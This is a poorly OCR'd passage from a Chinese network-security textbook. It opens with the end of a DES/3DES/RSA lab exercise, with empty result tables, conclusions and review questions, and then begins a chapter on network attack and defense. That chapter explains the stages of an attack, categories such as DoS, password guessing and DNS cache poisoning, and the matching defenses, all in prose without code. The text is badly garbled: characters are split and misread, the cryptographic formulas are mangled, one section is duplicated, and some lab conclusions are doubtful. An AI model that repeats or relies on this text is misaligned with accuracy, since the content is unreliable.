K,: 22222222( 解 密 ) 解密 结果 : 

K;: 11111111 (加 密 ) 加 密 结果 : 

明文 : hellodes 三 重 DES 密 文 长 度 : 12 

Ki: 11111111 (加 密 ) 加 密 结果 : 

K:: 11111111( 解 密 ) 解密 结果 : 

K;: 2222222( 加 密 ) 加 密 结果 : 

【实验 结论 1】 


(1) DES 解密 快 ,加 密 慢 。 

(2) 3DES 的 速度 与 解密 、 解 密 次 序 密切 相关 。 

(3) 编程 实现 对 某 个 文本 文件 进行 DES 加 密 、 解 密 , 记 录 加 密 、 解 密 时 间 和 文件 大 小 。 
要 求 加 解密 时 间 达 到 分 钟 级 别 。 

(4) 验证 DES 加 密会 产生 雪崩 效应 。 

Q@ 用 同样 密 钥 加 密 只 差 一 比特 的 两 个 明文 。 
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@ 用 只 差 一 比特 的 两 个 密 钥 加 密 同 样 明文 。 

(5) 编程 实现 对 字符 串 "hellorsa" 进 行 RSA 加 解密 ,记录 加 密 用 法 和 签名 用 法 加 解密 
的 结果 。 
待 加 密 明 文 : hellorsa 密 钥 长 度 : 256 密 文 长 度 : 


























公 钥 : 
私 钥 : 
RSA 加 密 用 法 

公 钥 加 密 后 密 文 : 

加 密 用 时 : 毫秒 ”解密 用 时 : 毫秒 

RSA 签名 用 法 

私 钥 加 密 后 密 文 : 

加 密 用 时 : 毫秒 ”解密 用 时 : 毫秒 

【实验 结论 2】 





对 于 相同 明文 ,使 用 相同 密 钥 对 ,使 用 公 钥 加 密 的 结果 和 私 钥 加 密 的 结果 不 同 。 
(6) 编程 实现 对 字符 串 "hellorsa "使 用 不 同 长 度 RSA 密 钥 加 解密 ,将 加 解密 的 结果 填 
人 和 人 表 2-22。 


表 2-22 RSA 不 同 密 钥 长 度 加 解密 





























算 法 明 文 密 钥 长 度 密 文 长 度 加 密 用 时 解密 用 时 
RSA 公 钥 加 密 hellorsa 512 
RSA 公 钥 加 密 hellorsa 1024 
RSA 私 钥 加 密 hellorsa 512 
RSA 私 钥 加 密 hellorsa 1024 
【实验 结论 3】 


随 着 密 钥 长 度 增加 ,加 解密 时 间 增 加 , 密 文 长 度 增加 。 
(7) 编程 实现 对 字符 串 "hellotest" 分 别 进行 DES 和 RSA 加 解密 ,将 加 解密 的 结果 填 入 
表 2-23。 


表 2-23 DES 和 RSA 加 解密 对 比 








加 密 字 符 密 钥 加 密 用 时 解密 用 时 密 文 密 文 长 度 
RSA hellotest 
DES hellotest 

















DES 密 文 为 十 六 进 制 形式 ,RSA 为 BASE64 形式 。 
【实验 结论 4】 
对 称 密 钥 算法 的 加 解密 时 间 远 远 小 于 公 钥 算法 的 加 解密 时 间 。 
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【思考 题 】 

1. 3DES 就 执行 效果 而 言 执 行 了 3 次 DES, 但 形式 上 执行 的 是 两 次 加 密 和 一 次 解密 , 必 
须 遵 守 EDE 规则 ; 3DES 使 用 了 2 个 不 同 密 钥 ,而 不 是 3 个 不 同 密 钥 。 设 待 加 密 信息 为 mm， 
加 密 密 钥 为 k1、k2,3DES 加 密 结果 为 : EC(D(E(m,k1),k2) ,k1)。 

(1) DC(E(m,k1) ,k1) 的 结果 是 什么 ? 

(2) DC(ECm,k1),k2) 形 式 上 是 解密 ,为 什么 效果 上 是 加 密 ? 

(3) E(D(E(m,k1) ,k1) ,k1)=E(m,k1) 成 立 吗 ? 

2. RSA 算法 。 

(1) 令 p=3,q 二 11, 使 用 RSA 算法 生成 对 应 密 钥 对 ; 

(2) 使 用 生成 密 钥 对 ,用 户 A 将 明文 “men” 加 密 后 传递 给 用 户 B, 实 现 数据 传输 的 机 密 
性 。 写 出 明文 “men” 加 解密 的 具体 过 程 ,此 时 密 钥 对 的 所 有 者 是 谁 ? 

(3) 使 用 生成 密 钥 对 ,将 明文 “men” 签 名 后 传递 给 用 户 B 实现 源 身份 认证 。 写 出 明文 
“men” 签 名 和 验证 的 具体 过 程 , 此 时 密 钥 对 的 所 有 者 是 谁 ? 

3. RSA 算法 具有 乘法 同 态 性 质 。 

(1) 加 密 算 法 具有 乘法 同 态 性 质 是 指明 文 < 满足 : 

DCE(Ca,A)X 开 (OA ) Ai) 一 4X0。 证 明 RSA 算法 具有 乘法 同 态 性 质 。 

(2) 设 长 方形 的 宽 ww==10, 高 = 二 9, 验 证 RSA 算法 具有 乘法 同 态 性 质 。 

(3) Alice 使 用 (2) 生 成 的 公 钥 加 密 w、h 生成 E(w,ka)、E(h,ka) 发 送 给 Cloud,Cloud 
计算 ECw,ka)XE(h ,ka ) 返 回 结果 给 Alice,Alice 使 用 私 钥 解密 DC(E(w,ka)XE(h,ka)， 
Ai ) 得 到 结果 wXh。 据 此 应 用 场景 说 明 同 态 加 密 可 以 保护 云 存 储 数据 安全 。 
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本 章 学 习 要 求 

。 掌握 网 络 攻击 概念 ,理解 网 络 攻击 过 程 和 网 络 攻击 防御 方法 ; 

4 掌握 DoS.DDoS、ARP 坎 骗 .缓冲 区 溢出 攻防 方法 ; 

4 掌握 网 络 安全 漏洞 概念 ,理解 常见 漏洞 修复 方法 ; 

4 掌握 网 络 安全 漏洞 扫描 工具 使 用 方法 ,理解 黑客 攻击 防范 方法 ; 

4 掌握 网 络 安全 扫描 和 网 络 监听 的 概念 ; 理解 网 络 安全 扫描 与 监听 防范 措施 。 


3.1 网 络 攻击 概述 


3.1.1 网 络 攻击 定义 


网 络 攻击 是 对 网 络 系统 的 机 密 性 、 完 整 性 可用性、 可 控 性 和 抗 抵赖 性 产生 危害 的 行为 。 
这 些 行为 可 抽象 地 分 为 4 种 基本 情形 : 信息 泄露 攻击 ` 完 整 性 破坏 攻击 .拒绝 服务 攻击 和 非 
法 使 用 攻击 。 

网 络 安全 威胁 来 自 于 黑客 的 攻击 ,而 要 保证 网 络 安全 , 则 需要 针对 网 络 安全 进行 有 效 的 
防御 ,因此 ,网 络 安全 从 大 的 方面 可 以 分 为 攻击 技术 和 防御 技术 两 大 类 。 这 两 个 技术 是 相 畏 
相 成 互相 促进 而 发 展 的 。 一 方面 ,黑客 进行 攻击 的 时 候 ,需要 了 解 各 种 防御 技术 和 方法 ,以 
便 能 绕 过 防御 而 对 目标 进行 攻击 ; 另 一 方面 ,在 进行 防御 的 时 候 则 必须 了 解 黑客 攻击 的 方 
式 方法 ,这 样 才能 有 效 地 应 对 各 种 攻击 。 攻 击 和 防御 永远 是 一 对 矛盾 。 图 3-1 用 图 示 的 方 
法 说 明了 网 络 安全 攻防 体系 所 涉及 的 内 容 。 











攻击 技术 攻击 类 型 防御 技术 
网 络 扫描 拒绝 服务 型 攻击 包 过 滤 技 术 防火 墙 
网 络 监听 利用 型 攻击 行为 特征 判断 技术 | 应 用 代理 
网 络 入 侵 信息 收集 型 攻击 加 密 技术 IDS/IPS 


假 消息 型 攻击 OS 安全 配置 技术 “| 安全 网 闻 


网 络 安全 的 实施 
工具 : 扫描 类 工具 ， 嗅 探 类 工具 ， 防 火 墙 软件 ，IDS/IPS 软 件 ， 加 密 / 解 密 软件 编程 
语言 : C，C++，Perl，Shell 等 


网 络 安全 的 物理 基础 
操作 系统 : Windows NT/2000/2003/2008，Linux，UNIX 
网 络 协 议 : TCP/IP 协 议 繁 各 种 相关 协议 ， 其 他 相关 的 通信 协议 


网 络 后 门 与 隐身 























图 3-1 网 络 安全 的 攻防 体系 结构 
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1. 网 络 攻击 的 一 般 过 程 
了 解 网 络 攻击 过 程 ,知己 知 彼 ,可 以 更 好 地 进行 网 络 安全 防范 工作 。 通 过 总 结 , 可 以 将 
网 络 攻击 归纳 为 以 下 8 个 步骤 。 
(1) 攻击 者 的 身份 和 位 置 隐藏 : 利用 被 侵入 的 主机 作为 跳板 ,如 在 安装 Windows 的 计 
算 机 内 利用 Wingate 软件 作为 跳板 ,利用 配置 不 当 的 Proxy 作为 踏板 .电话 转 接 技术 、 盗 用 
他 人 的 账号 .代理 、 伪 造 IP 地 址 、 假 冒 用 户 账号 。 
通常 有 两 种 方法 隐藏 自己 IP: 
。 首先 入 侵 互 联网 上 的 一 台 计 算 机 (俗称 “肉鸡 ”) ,再 利用 这 台 计 算 机 进行 网 络 攻击 ， 
这 样 即 使 被 发 现 了 ,也 是 “肉鸡 ”的 IP 地 址 。 

。 做 多 级 跳板 “Socket 代理 ”, 在 入 侵 的 计算 机 上 留 下 的 是 代理 计算 机 的 IP 地 址 。 比 
如 攻击 A 国 的 站 点 ,一 般 选择 离 A 国 很 远 的 B 国 计 算 机 作为 肉鸡" 或者“ 代理”, 这 
样 跨国 度 的 攻击 ,一 般 很 难 被 侦破 。 

(2) 收集 攻击 目标 信息 : 主要 方法 有 口令 攻击 、 端 口 扫 描 、 漏 洞 检测 、 对 目标 系统 进行 
整体 安全 性 分 析 , 还 可 利用 如 ISS、.SATAN 和 NESSUS 等 报告 软件 来 收集 目标 信息 。 

踩点 就 是 通过 各 种 途径 对 所 要 攻击 的 目标 进行 多 方面 的 了 解 ,确定 攻击 的 时 机 。 扫 描 
的 目的 是 利用 各 种 工具 在 攻击 目标 的 IP 地 址 或 地 址 段 的 主机 上 寻找 漏洞 。 

从 安全 威胁 的 演进 史上 来 看 ,传统 物理 空间 和 网 络 空间 本 来 就 是 联通 的 ,早期 黑客 针对 
大 型 机 系统 的 攻击 ,很 多 都 是 依靠 人 员 混 和 人 办公 场 所 踩点 的 方式 完成 ,就 像 上 世纪 凯 文 ， 米 
特 尼 克 装 扮 成 清洁 工 偷 取 计算 机 的 操作 手册 一 样 。 只 是 随 着 网 络 的 普及 ,这 种 踩点 逐步 脱 
离 了 距离 的 困扰 ,并 使 成 本 逐渐 下 降 。 随 着 对 风险 认 知 的 加 深 , 我 们 需要 看 到 的 是 ,传统 的 
把 虚拟 世界 安全 和 物理 世界 安全 制 裂 看 待 的 思维 ,传统 的 界定 网 络 风 险 和 现实 风险 泾 油分 
明 的 执 念 ,都 会 被 动摇 。 我 们 看 到 的 将 只 是 形形色色 攻击 者 为 达成 攻击 目的 所 采用 的 各 种 
攻击 手段 ,至 于 是 单纯 地 通过 网 络 进行 攻击 ,还 是 在 攻击 路 径 上 结合 传统 的 物理 和 电磁 手 
段 , 只 是 高 级 攻击 者 的 后 备 选择 。 

(3) 挖掘 漏洞 信息 : 常用 的 技术 有 系统 或 应 用 服务 软件 漏洞 .主机 信任 关系 漏洞 .目标 
网 络 的 使 用 者 漏洞 .通信 协议 漏洞 和 网 络 业务 系统 漏洞 。 

(4) 获取 目标 访问 权限 : 通过 一 切 办 法 获得 管理 员 口 令 。 得 到 管理 员 权 限 的 目的 是 连 
接 到 远程 计算 机 ,对 其 进行 控制 ,达到 攻击 目的 。 获 得 系统 及 管理 员 权限 的 方法 有 : 通过 系 
统 漏洞 获得 系统 权限 ,通过 管理 漏洞 获得 管理 员 权 限 ,通过 软件 漏洞 得 到 系统 权限 ,通过 监 
听 获 得 敏感 信息 进一步 获得 相应 权限 ,通过 弱 口令 获得 远程 管理 员 的 用 户 密 码 ,通过 穷 举 法 
获得 远程 管理 员 的 用 户 密码 ,通过 攻破 与 目标 机 有 信任 关系 的 另 一 台 机 器 进而 得 到 目标 机 
的 控制 权 ,通过 欺骗 获得 权限 以 及 其 他 有 效 的 方法 。 

(5) 隐蔽 攻击 行为 : 包括 连接 隐藏 .进程 隐藏 和 文件 隐藏 等 。 

(6) 实施 攻击 : 攻击 主要 包括 修改 删除 重要 数据 窃听 敏感 数据 .停止 网 络 服务 和 下 载 
敏感 数据 等 。 

(7) 开辟 后 门 : 主要 有 放宽 文件 许可 权 、 重 新 开放 不 安全 的 服务 (如 TFTP) 等 ,修改 系 
统 的 配置 如 系统 启动 文件 .替换 系统 本 身 的 共享 库 文件 ,修改 系统 的 源 代码 ,安装 各 种 特 洛 
伊 木马 、 安 装 Sniffers 和 建立 隐蔽 信道 等 。 上 传 恶意 软件 ,以 确保 能 够 重新 进入 系统 。 在 已 
经 攻破 的 计算 机 上 植 入 一些 后 门 程序 。 
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(8) 清除 攻击 痕迹 : 一 次 成 功 人 侵 之 后 ,一 般 在 对 方 的 计算 机 上 已 经 存储 了 相关 的 登 
录 日 志 , 这 样 就 很 容易 被 管理 员 发 现 。 

采用 的 主要 方法 有 自 改 日 志文 件 中 的 审计 信息 改变 系统 时 间 造 成 日 志文 件数 据 紊乱 
以 迷惑 系统 管理 员 、 删 除 或 停止 审计 服务 进程 .干扰 入 侵 检测 系统 正常 运行 和 修改 完整 性 检 
测 标签 等 。 

2. 网 络 攻 击 的 防御 技术 


(1) 包 过 滤 技 术 , 也 是 防火 墙 最 基本 的 技术 , 包 过 滤 技 术 是 用 来 控制 内 、 外 网 络 数据 流 
入 和 流出 ,通过 对 数据 流 的 每 个 包 进 行 检查 ,根据 数据 报 的 源 地 址 、 目 的 地 址 、TCP 和 UDP 
的 端口 号 ,以 及 TCP 的 其 他 状态 来 确定 是 否 允 许 数 据 包 通过 。 

(2) 行为 特征 判断 技术 ,属于 比 包 过 滤 技 术 更 可 靠 、 精 确 的 攻击 判断 技术 ,通过 对 攻击 
者 的 一 系列 攻击 数据 包 行为 规律 的 分 析 、 归 纳 、 总 结 ,结合 专家 的 经 验 ,提炼 出 攻击 识别 规则 
知识 库 ; 模拟 专家 发 现 新 攻击 的 机 理 ,通过 分 布 在 用 户 计算 机 系统 上 的 各 种 探 针 , 动 态 监 视 
程序 运行 的 动作 ,并 将 程序 的 一 系列 操作 通过 逻辑 关系 分 析 组 成 有 意义 的 行为 ,再 结合 应 用 
攻击 识别 规则 知识 ,实现 对 攻击 的 自动 识别 。 

(3) 加 密 技 术 ,是 最 常用 的 安全 保密 手段 ,利用 技术 手段 (加 密 算 法 ) 把 重要 的 数据 变 为 
乱码 (加 密 ) 传 送 ,到 达 目 的 地 后 再 用 相同 或 不 同 的 手段 还 原 (解密 ) 为 原文 。 

(4) OS 安全 配置 技术 ,通过 采用 安全 的 操作 系统 ,并 对 操作 系统 进行 各 种 安全 配置 ,以 
保证 合法 访问 者 能 够 进行 操作 和 访问 ,隔离 和 阻 断 非法 访问 者 的 请 求 。 

应 用 以 上 技术 所 采用 的 防御 手段 (或 设备 ) 通 常 有 : 

(1) 防火 墙 ,一 个 由 软件 、 硬 件 或 者 是 二 者 组 合 而 成 ,在 内 部 网 和 外 部 网 之 间 .专用 网 与 
公共 网 之 间 的 界面 上 放置 的 安全 设备 ,通过 监测 .限制 ,更改 跨越 防火 墙 的 数据 流 , 尽 可 能 地 
对 外 部 屏蔽 网 络 内 部 的 信息 、 结 构 和 运行 状况 ,以 此 来 实现 网 络 的 安全 保护 。 

(2) 应 用 代理 ,是 彻底 隔断 通信 两 端的 直接 通信 的 网 络 安全 设备 ,在 安装 了 应 用 代理 
后 ,所 有 通信 都 必须 经 应 用 层 代理 转发 ,访问 者 在 任何 时 候 都 不 能 与 服务 器 建立 直接 的 连 
接 ,应 用 层 的 协议 会 话 过 程 必须 符合 代理 的 安全 策略 要 求 ,而 将 不 符合 安全 要 求 的 各 种 连接 
阻 断 或 屏蔽 ,保护 网 络 的 安全 。 

(3) IDS/IPS( 和 信 侵 检测 系统 /入 侵 防 御 系 统 ) ,依照 一 定 的 安全 策略 ,对 网 络 、 系 统 的 运 
行 状况 进行 监视 , 尽 可 能 发 现 各 种 攻击 企图 、 攻 击 行为 或 者 攻击 结果 ,以 保证 网 络 系统 资源 
的 机 密 性 、 完 整 性 和 可 用 性 。 

(4) 安全 网 闻 ,是 使 用 带 有 多 种 控制 功能 的 固态 开关 读 写 媒 体 连接 两 个 独立 主机 系统 
的 信息 安全 设备 。 物 理 隔 离 网 疗 所 连接 的 两 个 独立 主机 系统 之 间 ,不 存在 通信 的 物理 连接 、 
逻辑 连接 、 信 息 传输 命令 .信息 传输 协议 ,不 存在 依据 协议 的 信息 包 转 发 ,只 有 数据 文件 的 无 
协议 “摆渡 ”, 且 对 固态 存储 媒体 只 有 "* 读 "和 * 写 ?两 个 命令 ,所 以 ,物理 隔离 网 疗 从 物理 上 隔 
离 、 阻 断 了 具有 潜在 攻击 可 能 的 一 切 连接 ,使 “黑客 "无 法 入 侵 、 无 法 攻击 、 无 法 破坏 ,提高 了 
受 保护 网 络 的 安全 性 。 

上 面 所 列 的 技术 是 网 络 安 全 攻击 防御 体系 中 经 常用 到 的 技术 ,除了 上 述 所 列 的 技术 以 
外 ,网 络 安全 管理 技术 、 身 份 认证 与 访问 控制 技术 ,病毒 及 恶意 软件 防护 技术 、Web 站 点 安 
全 技术 .数据库 系统 安全 技术 以 及 电子 商务 安全 技术 等 都 是 网 络 安全 技术 所 涉及 的 内 容 。 

网 络 安全 的 实施 过 程 中 需要 各 种 类 型 的 工具 ,包括 扫描 类 工具 、 嗅 探 类 工具 、 防 火 墙 软 


第 3 章 网络 攻防 技术 103 





件 .IDSVIPS 软件 ,加密 / 解 密 软 件 等 。 编 写 这 些 工 具 采 用 的 编程 语言 主要 有 C、C++、Perl、 
Shell 等 。 

对 于 任何 系统 ,网 络 的 安全 是 根本 ,因此 网 络 安全 的 物理 基础 也 是 网 络 安全 的 根本 ,网 
络 安全 的 物理 基础 包括 安全 的 操作 系统 ,如 Windows NT/2000/2003/2008、Linux、UNIX 
等 ; 也 包括 各 种 网 络 协议 ,通常 使 用 的 是 TCP/IP 协议 簇 各 种 相关 协议 和 其 他 相关 的 通信 
协议 。 
3.1.2 网 络 攻 击 分 类 


网 络 攻击 的 方式 不 同 ,产生 的 攻击 类 型 不 同 , 最 后 导致 的 攻击 结果 也 不 同 。 

从 攻击 的 方式 来 看 ,有 利用 系统 本 身 的 漏洞 进行 的 攻击 ,有 利用 各 种 命令 和 工具 进行 的 
攻击 ,有 利用 虚假 的 IP 地 址 进行 欺骗 性 的 攻击 ,有 利用 恶意 代码 或 病毒 进行 的 攻击 ,也 有 利 
用 网 络 部 署 的 缺陷 和 防范 措施 不 到 位 进行 的 攻击 。 

从 攻击 的 类 型 来 看 ,有 通过 单个 计算 机 进行 的 攻击 ,也 有 通过 控制 僵尸 网 络 以 多 个 计算 
机 进行 的 攻击 ; 有 间 砍 式 的 攻击 ,也 有 连续 式 的 不 间断 的 攻击 ; 有 隐秘 的 攻击 ,也 有 非 隐秘 
式 的 攻击 。 

从 攻击 导致 的 结果 来 看 , 轻 者 导致 受 攻击 者 运行 速度 变 慢 ,无 法 提供 正常 的 服务 ; 重 者 
系统 崩溃 。 

通过 将 攻击 的 方式 与 攻击 类 型 的 结合 ,攻击 类 型 主要 有 拒绝 服务 攻击 、 利 用 型 攻击 \ 信 
息 收集 型 攻击 、 假 消息 攻击 等 等 。 

攻击 技术 包括 4 类 攻击 方式 。 

1. 拒绝 服务 攻击 

拒绝 服务 攻击 (Denial of Service,DoS) 攻 击 是 目前 最 常见 的 一 种 攻击 类 型 。 从 网 络 攻 
击 的 各 种 方法 和 所 产生 的 破坏 情况 来 看 ,DoS 算是 一 种 很 简单 .但 又 很 有 效 的 攻击 方式 。 它 
的 目的 就 是 拒绝 用 户 的 服务 访问 ,破坏 组 织 的 正常 运行 ,最 终 使 网 络 连 接 堵塞 ,或 者 服务 器 
因 疲 于 处 理 攻 击 者 发 送 的 数据 包 而 使 服务 器 系统 的 相关 服务 崩溃 ,无 法 给 合法 用 户 提供 
服务 。 

DoS 包括 死亡 之 ping(ping of death) , 泪 滴 (teardrop) .UDP 洪水 (UDP flood) .SYN 洪 
水 (SYN flood) 、Land 攻击 、Smurf 攻击 、Fraggle 攻击 、 电 子 邮 件 炸 弹 和 畸 形 消息 攻击 等 。 
DoS 详细 介绍 以 及 防御 方法 见 3. 2.2 节 。 

2. 利用 型 攻击 

利用 型 攻击 是 一 类 试图 直接 对 用 户 的 机 器 进行 控制 的 攻击 ,最 常见 的 有 3 种 : 

(1) 口令 猜测 。 一 旦 黑客 识别 了 一 台 主 机 而 且 发 现 了 基于 NetBIOS、Telnet 或 NFS 等 
服务 的 可 利用 用 户 账号 ,就 能 实现 成 功 的 口令 猜测 。 

防御 : 要 选用 难以 猜测 的 口令 ,比如 词 和 标点 符号 的 组 合 。 确 保 像 NFS、NetBIOS 和 
Telnet 等 可 利用 的 服务 不 暴露 在 公共 范围 。 如 果 该 服务 支持 锁定 策略 ,就 进行 锁定 。 

(2) 特洛伊 森马。 特洛伊 木马 是 一 种 或 是 直接 由 一 个 黑客 或 是 通过 一 个 不 会 令 人 起 疑 
的 用 户 秘密 安装 到 目标 系统 的 程序 。 一 旦 安装 成 功 并 取得 管理 员 权 限 ,安装 此 程序 的 人 就 
可 以 直接 远程 控制 目标 系统 。 
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防御 : 避免 下 载 可 疑 程序 并 拒绝 执行 ,运用 网 络 安 全 扫描 软件 定期 监视 内 部 主机 上 的 
TCP 服务 。 

(3) 缓冲 区 溢出 。 由 于 在 很 多 的 服务 程序 中 大 意 的 程序 员 使 用 像 与 strcpy() 和 strcat() 类 
似 的 不 进行 有 效 位 检查 的 函数 ,最 终 可 能 导致 恶意 用 户 编 写 一 小 段 程序 来 进一步 打开 安全 
缺口 ,然后 将 该 代码 置 于 缓冲 区 有 效 载荷 末尾 ,这 样 , 当 发 生 缓 冲 区 溢出 时 ,返回 指针 指向 恶 
意 代码 ,系统 的 控制 权 就 会 被 夺取 。 

防御 : 利用 SafeLib \tripwire 这 样 的 程序 保护 系统 ,或 者 浏览 最 新 的 安全 公告 不 断 更 新 
操作 系统 。 

3. 信息 收集 型 攻击 

信息 收集 型 攻击 并 不 对 目标 本 身 造 成 危害 ,但 这 类 攻击 会 为 进一步 人 侵 提供 有 用 的 信 
息 。 主 要 包括 扫描 技术 、 体 系 结构 刺探 和 利用 信息 服务 等 。 

(1) 地 址 扫描 。 运 用 ping 程序 探测 目标 地 址 ,对 此 作出 响应 的 表示 对 应 主机 存在 。 

防御 : 在 防火 墙 上 过 滤 掉 ICMP 应 答 消息 。 

(2) 端口 扫描 。 通 常 使 用 一 些 软 件 ,向 大 范围 的 主机 连接 进行 一 系列 的 TCP 端口 扫 
描 , 软 件 报告 它 成 功 地 建立 了 连接 的 主机 所 开放 的 端口 。 

防御 : 许多 防火 墙 能 检测 到 是 否 被 扫描 ,并 自动 阻 断 扫描 企图 。 

(3) 反响 映射 。 黑 客 向 主机 发 送 虚 假 消 息 , 然 后 根据 返回 “host unreachable” 这 一 消息 
特征 判断 出 哪些 主机 是 存在 的 。 目 前 由 于 正常 的 扫描 活动 容易 被 防火 墙 侦 测 到 ,黑客 转 而 
使 用 不 会 触发 防火 墙 规则 的 消息 类 型 ,这 些 消息 类 型 包括 RESET 消息 .SYN-ACK 消息 、 
DNS 响应 包 。 

防御 : NAT 和 非 路 由 代理 服务 器 能 够 自动 抵御 此 类 攻击 ,也 可 以 在 防火 墙 上 过 滤 
“host unreachable”ICMP 应 答 。 

(4) 慢 速 扫 描 。 巾 于 一 般 扫描 侦 测 器 的 实现 是 通过 监视 某 个 时 间 帧 里 一 台 特 定 主机 发 
起 的 连接 的 数目 (例如 每 秒 10 次 ) 来 决定 是 否 在 被 扫描 ,这 样 黑客 可 以 通过 使 用 扫描 速度 慢 
一 些 的 扫描 软件 进行 扫描 。 

防御 : 通过 引诱 服务 来 对 慢 速 扫描 进行 侦 测 。 

(5) 体系 结构 探测 。 黑 客 使 用 具有 已 知 响应 类 型 的 数据 库 的 自动 工具 ,对 来 自 目 标 主 
机 的 、 对 坏 数据 包 传 送 所 做 出 的 响应 进行 检查 。 由 于 每 种 操作 系统 都 有 其 独特 的 响应 方法 
(例如 Windows NT 和 Solaris 的 TCP/IP 堆栈 具体 实现 有 所 不 同 ) ,通过 将 此 独特 的 响应 与 
数据 库 中 的 已 知 响应 进行 对 比 ,黑客 经 常 能 够 确定 出 目标 主机 所 运行 的 操作 系统 。 

防御 : 去 掉 或 修改 各 种 Banner, 包 括 操作 系统 和 各 种 应 用 服务 的 Banner, 阻 断 用 于 识 
别 的 端口 ,扰乱 对 方 的 攻击 计划 。 

(6) DNS 域 转换 。DNS 协议 不 对 转换 信息 的 更 新 进行 身份 认证 ,这 使 得 该 协议 被 他 人 
以 一 些 不 同 的 方式 加 以 利用 。 如 果 你 维护 着 一 台 公 共 的 DNS 服务 器 ,黑客 只 需 实施 一 次 域 
转换 操作 就 能 得 到 你 所 有 主机 的 名 称 以 及 内 部 IP 地 址 。 

防御 : 在 防火 墙 处 过 滤 掉 域 转换 请 求 。 

(7) finger 服务 。 黑 客 使 用 finger 命令 来 刺探 一 台 finger 服务 器 以 获取 关于 该 系统 的 
用 户 信息 。 

防御 : 关闭 finger 服务 并 记录 尝试 连接 该 服务 的 对 方 IP 地 址 ,或 者 在 防火 墙 上 进行 
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过 滤 。 

(8) LDAP 服务 。 黑 客 使 用 LDAP 协议 窥探 网 络 内 部 的 系统 及 其 用 户 信息 。 

防御 : 对 于 刺探 内 部 网 络 的 LDAP 进行 阻 断 并 记录 ,如果 在 公共 机 器 上 提供 LDAP 服 
务 ,那么 应 把 LDAP 服务 器 放 入 DMZ。 

4. 假 消息 攻击 

用 于 攻击 目标 配置 不 正确 的 消息 ,主要 包括 DNS 高 速 缓存 污染 、 伪 造 电子 邮 件 。 

(1) DNS 高 速 缓存 污染 。 由 于 DNS 服务 器 与 其 他 名 称 服务 器 交换 信息 的 时 候 并 不 进 
行 身份 验证 ,这 就 使 得 黑客 可 以 将 不 正确 的 信息 掺 进来 并 把 用 户 引 向 黑客 自己 的 主机 。 

防御 : 在 防火 墙 中 过 滤 入 站 的 DNS 更 新 内 容 ; 区 分 内 部 DNS 服务 器 和 外 部 DNS 服务 
器 ,禁止 外 部 DNS 服务 器 更 改 内 部 DNS 服务 器 对 内 部 机 器 的 DNS 解析 内 容 。 

(2) 伪造 电子 邮件 。 由 于 SMTP 并 不 对 邮件 的 发 送 者 的 身份 进行 鉴定 ,因此 黑客 可 以 
对 内 部 客户 伪造 电子 邮件 ,声称 是 来 自 某 个 客户 .声称 认识 并 能 取得 信任 的 人 ,邮件 可 能 附 
带 上 可 安装 的 特洛伊 木马 程序 ,或 者 是 一 个 引 向 恶意 网 站 的 链接 。 

防御 : 使 用 PGP 等 安全 工具 并 安装 电子 邮件 证 书 。 





3.2 常见 网 络 攻防 方法 


目前 网 络 安全 研究 趋向 于 攻防 结合 ,追求 动态 安全 。 研 究 黑客 常用 攻击 手段 和 工具 必 
然 为 防御 技术 提供 启示 和 思路 。 研 究 黑客 攻击 手段 并 利用 这 些 攻 击 手段 和 工具 对 网 络 进行 
模拟 攻击 , 找 出 网 络 的 安全 漏洞 也 成 为 网 络 安全 维护 手段 的 一 个 重要 组 成 部 分 。 


3.2.1 口令 入 侵 及 其 防范 方法 


所 谓 口令 入 侵 ,是 指使 用 某 些 合法 用 户 的 账户 和 口令 登录 到 目的 主机 ,然后 再 实施 攻击 
活动 。 这 种 方法 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 账号 ,然后 再 对 合法 用 户 
的 口令 进行 破译 。 不 过 攻击 者 已 大 量 采用 一 种 可 以 绕 开 或 屏蔽 口令 保护 的 程序 来 完成 这 项 
工作 。 对 于 那些 可 以 解 开 或 屏蔽 口令 保护 的 程序 通常 被 称 为 "Crack”。 实 际 上 真正 的 加 密 
口令 是 很 难 逆向 破解 的 。 

1. 口令 入 侵 方法 


(1) 暴力 破解 。 暴 力 破解 基本 上 是 一 种 被 动 攻击 的 方式 。 黑 客 在 知道 用 户 的 账户 号 
后 ,利用 一 些 专门 的 软件 强行 破解 用 户口 令 ,这 种 方法 不 受 网 段 限制 ,但 需要 有 足够 的 耐心 
和 时 间 。 这 些 工具 软件 可 以 自动 地 从 黑客 字典 中 取出 一 个 单词 ,作为 用 户 的 口令 输入 给 远 
端的 主机 ,申请 进入 系统 ,但 是 这 样 也 容易 因为 网 络 数 据 流量 和 访问 异常 而 被 网 络 管理 员 
发 现 。 

(2) 登录 界面 攻击 法 。 黑 客 可 以 在 被 攻击 的 主机 上 ,利用 程序 伪造 一 个 登录 界面 ,以 骗 
取 用 户 的 账号 和 密码 。 当 用 户 在 这 个 伪造 界面 上 输入 登录 信息 后 ,程序 可 将 用 户 的 输入 信 
息 记录 并 传送 到 黑客 的 主机 ,然后 关闭 界面 ,给 出 提示 信息 “系统 故障 ”或 “输入 错误 ”, 要 求 
用 户 重新 登录 。 重 新 出 现 的 登录 界面 才 是 系统 真正 的 登录 界面 。 
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过 滤 。 

(8) LDAP 服务 。 黑 客 使 用 LDAP 协议 窥探 网 络 内 部 的 系统 及 其 用 户 信息 。 

防御 : 对 于 刺探 内 部 网 络 的 LDAP 进行 阻 断 并 记录 ,如果 在 公共 机 器 上 提供 LDAP 服 
务 ,那么 应 把 LDAP 服务 器 放 入 DMZ。 

4. 假 消息 攻击 

用 于 攻击 目标 配置 不 正确 的 消息 ,主要 包括 DNS 高 速 缓存 污染 、 伪 造 电子 邮 件 。 

(1) DNS 高 速 缓存 污染 。 由 于 DNS 服务 器 与 其 他 名 称 服务 器 交换 信息 的 时 候 并 不 进 
行 身份 验证 ,这 就 使 得 黑客 可 以 将 不 正确 的 信息 掺 进来 并 把 用 户 引 向 黑客 自己 的 主机 。 

防御 : 在 防火 墙 中 过 滤 入 站 的 DNS 更 新 内 容 ; 区 分 内 部 DNS 服务 器 和 外 部 DNS 服务 
器 ,禁止 外 部 DNS 服务 器 更 改 内 部 DNS 服务 器 对 内 部 机 器 的 DNS 解析 内 容 。 

(2) 伪造 电子 邮件 。 由 于 SMTP 并 不 对 邮件 的 发 送 者 的 身份 进行 鉴定 ,因此 黑客 可 以 
对 内 部 客户 伪造 电子 邮件 ,声称 是 来 自 某 个 客户 .声称 认识 并 能 取得 信任 的 人 ,邮件 可 能 附 
带 上 可 安装 的 特洛伊 木马 程序 ,或 者 是 一 个 引 向 恶意 网 站 的 链接 。 

防御 : 使 用 PGP 等 安全 工具 并 安装 电子 邮件 证 书 。 





